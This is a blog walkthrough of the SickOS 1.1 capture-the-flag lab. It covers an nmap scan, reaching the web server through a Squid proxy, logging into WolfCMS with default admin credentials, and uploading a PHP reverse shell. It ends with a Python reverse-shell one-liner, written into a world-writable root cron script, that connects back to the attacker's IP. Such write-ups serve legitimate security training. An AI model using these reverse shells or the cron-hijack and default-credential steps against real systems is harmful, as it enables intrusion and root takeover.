SickOS - VULNHUB - Linux -1.1
Complete walkthrough, of the season content:
RECOGNITION PHASE:
NETWORK DISCOVERY:
We can use a couple of tools in order to make this task, ane of them is arp-scan that use request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol as you can see below:
The other tool is netdiscover, with the same concept but using an interface like parameter:
NMAP:
On this step, from the attaker machine we recover information about the open ports and services of out target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.
nmap -sC -sV -n -v -p - 192.168.1.33 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-20 19:42 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating Connect Scan at 19:42
Scanning 192.168.1.33 [65535 ports]
Discovered open port 22/tcp on 192.168.1.33
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.86% done; ETC: 19:48 (0:05:39 remaining)
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.37% done; ETC: 19:47 (0:05:15 remaining)
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.50% done; ETC: 19:47 (0:05:03 remaining)
Connect Scan Timing: About 23.82% done; ETC: 19:45 (0:02:11 remaining)
Discovered open port 3128/tcp on 192.168.1.33
Connect Scan Timing: About 52.70% done; ETC: 19:44 (0:01:04 remaining)
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 90.92% done; ETC: 19:44 (0:00:10 remaining)
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.18% done; ETC: 19:44 (0:00:10 remaining)
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.38% done; ETC: 19:44 (0:00:10 remaining)
Completed Connect Scan at 19:44, 113.37s elapsed (65535 total ports)
Initiating Service scan at 19:44
Scanning 2 services on 192.168.1.33
Completed Service scan at 19:44, 11.03s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.33.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.83s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Nmap scan report for 192.168.1.33
Host is up (0.0026s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported: GET HEAD
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.56 seconds
The conclusion of nmap scan is that we found the following open ports with the services:
EXPLOITATION:
**On this target machine the ping is unavailable
22 ssh
ssh root@192.168.1.33
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:8
remove with:
ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.1.33"
ECDSA host key for 192.168.1.33 has changed and you have requested strict checking.
Host key verification failed.
The connection by ssh it's not allowed, its seems that is for a bad configuration with cryptography
3128 squid proxy!
One of most important keys on this CTF is know that you can use the external service such a proxy for your local browser and your tools:
 |
With proxy enable: we can access to the target server on port 80 using http protocol http://192.168.1.33/
And this is the index:
reviewing the robots.txt file:
And we found a new context: /wolfcms
Searching the way for exploiting the wolfcms:
sudo searchsploit wolfcms
[sudo] password for kali:
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting | php/webapps/18652.txt
WolfCMS 0.8.3.1 - Cross-Site Request Forgery | php/webapps/44418.txt
WolfCMS 0.8.3.1 - Open Redirection | php/webapps/44421.txt
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
It's seems that there are no directly way for remote code execution on the external target, but we found an util information:
kali@kali:~/VULNHUB/VulOS/data$ cat `sudo locate php/webapps/44421.txt` | grep admin
# Navigate to http://[URL]/wolfcms/?/admin/login
On the previous login url we can access using admin/admin credentials:
http://192.168.1.33/wolfcms/?/admin/login
Create new page, with a php reverse shell content:
$ip = '192.168.1.42'; // CHANGE THIS
$port = 8989; // CHANGE THIS
** The previous variables should point to your attacker machine.
* For example this reverse shell
https://github.com/pentestmonkey/php-reverse-shell
Launch /preview the webpage content:
and wait in your attacker machine with a netcat command on tcp protocol at port 8989, for get a new session:
Obtain remote shell from the target machine:
Privilege Escalation:
Using a sh script (lse.sh), you can find crontab vulnerability:
** you would find this script for example in this url:
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
As you can see in the previous image, with a user root everybody can execute the python script:
# ls -ltrh /var/www/connect.py
-rwxrwxrwx 1 root root 217 Aug 21 00:37 /var/www/connect.py
In that case we can use it for spawn a reverse shell such a root user, from the target machine to the attacker machine, This script is execute every minute by the crontab (* * * * * root /var/www/connect.py):
# cat /var/www/connect.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.42",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Waiting for the root shell on the attacker machine:
 |
No comments:
Post a Comment